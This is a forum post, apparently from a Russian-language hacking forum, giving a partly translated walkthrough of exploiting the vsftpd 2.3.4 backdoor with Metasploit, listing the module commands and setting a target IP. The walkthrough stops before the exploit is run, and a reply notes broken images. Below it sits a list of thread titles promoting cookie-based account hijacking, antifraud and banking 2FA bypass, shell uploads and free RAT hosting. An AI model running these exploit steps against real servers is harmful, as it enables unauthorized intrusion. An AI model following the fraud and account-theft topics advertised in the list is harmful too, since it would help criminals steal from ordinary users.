Hacking an FTP server using Kali Linux (vsftpd vulnerability)

TomMuller · Sep 12, 2021

FTP-это сервис, который обычно используется на веб-серверах веб-мастерами для удаленного доступа к файлам. Таким образом, практически невозможно не найти эту услугу в одной из систем наших клиентов во время взаимодействия.

Вспомогательный модуль "vsftpd" будет сканировать диапазон IP-адресов, пытающихся войти на FTP-серверы. Этот модуль будет проверять учетные записи FTP на ряде компьютеров и сообщать об успешных входах в систему. Если вы загрузили плагин базы данных и подключились к базе данных, этот модуль будет записывать успешные входы в систему и хосты, чтобы вы могли отслеживать свой доступ.

Давайте начнем взламывать FTP-сервер с помощью Kali Linux (уязвимость vsftpd)
Шаг 1 :- PostgreSQL доступен интегрированным с управлением пакетами на большинстве платформ Linux. Когда это доступно, это рекомендуемый способ установки PostgreSQL, поскольку он обеспечивает надлежащую интеграцию с операционной системой, включая автоматическое исправление и другие функции управления.

Шаг 2 :- Это msfconsole. Msfconsole-это основной интерфейс для MetaSploit. Существуют графические интерфейсы (armitage), а также веб-интерфейс (websploit). С помощью msfconsole вы можете запускать эксплойты, создавать прослушиватели, настраивать полезные нагрузки и т.д.

Шаг 3 :- Текущее состояние базы данных.
db_status

Code
db_status
search vsftpd

Code
search vsftpd
Шаг 4 :- Используйте бэкдор Vsftpd.
use exploit/unix/ftp/vsftpd_234_backdoor

Code
use exploit/unix/ftp/vsftpd_234_backdoor
Шаг 5 :- Установите целевой IP в RHOSTS.
set RHOSTS 192.168.69.131

Code
set RHOSTS 192.168.69.131
Статья о взломе баз данных MySQL с помощью Metasploit.
https://zelenka.guru/threads/2948735/

RSPARKER · Sep 12, 2021

Картиночки битые, поправь

We go to cookies to Roblox account on iPhone/Android

About CSRF Attack and the importance of CSRF TOKEN on your site

All about SQL Injections and No SQL Injections and their exploitation

We occupy all places in the cinema without investments

How to get around the antifrod Google cards?

Help with pentest

The history of 2f bypass on a network of banks with a capitalization of 50V+

We find unpacked dads for our goals

Khostim Ratnik for free without opening ports and hosting

Do you have an old tunnel in Playit.gg and can not delete it? We will decide

How to *****For Cover with Dahua DVR standard

We go around the game launches (GTA, Far Cry, RDR, etc.)

How to view any video from any user in the office

We loot additional proxies

Bypassing the Social Club launcher in games (GTA IV, GTA V, RDR II, etc.)

Acquaintance with the web scanner of the vulnerabilities of Nikto and the exploitation of XSS

An example of the operation of WebSocket vulnerability (Burp Suite)

All about File Inclusion and Remote File Inclusion

Hacking games in Telegram.

Uploading a shell on vBulletin 5

We register the Yandex Account for Tempom

XSS Administrator Escalation (WP) | Elevating rights to admin | We get access without restrictions

Login to your account using Cookie using Roblox as an example

Windows Theme Spoofing CVE-2024-21320

WAF bypass. How to find out the IP of a site that uses WAF or DDoS protection

We get an account on xaker.ru without registration (without subscription)

Vulnerability in remote access software

The story of how I completely hacked wordpress sites..

RCE via plugin loading (CVE-2024-31210)

Bypass XSS protection

Hacking an FTP server using Kali Linux (vsftpd vulnerability)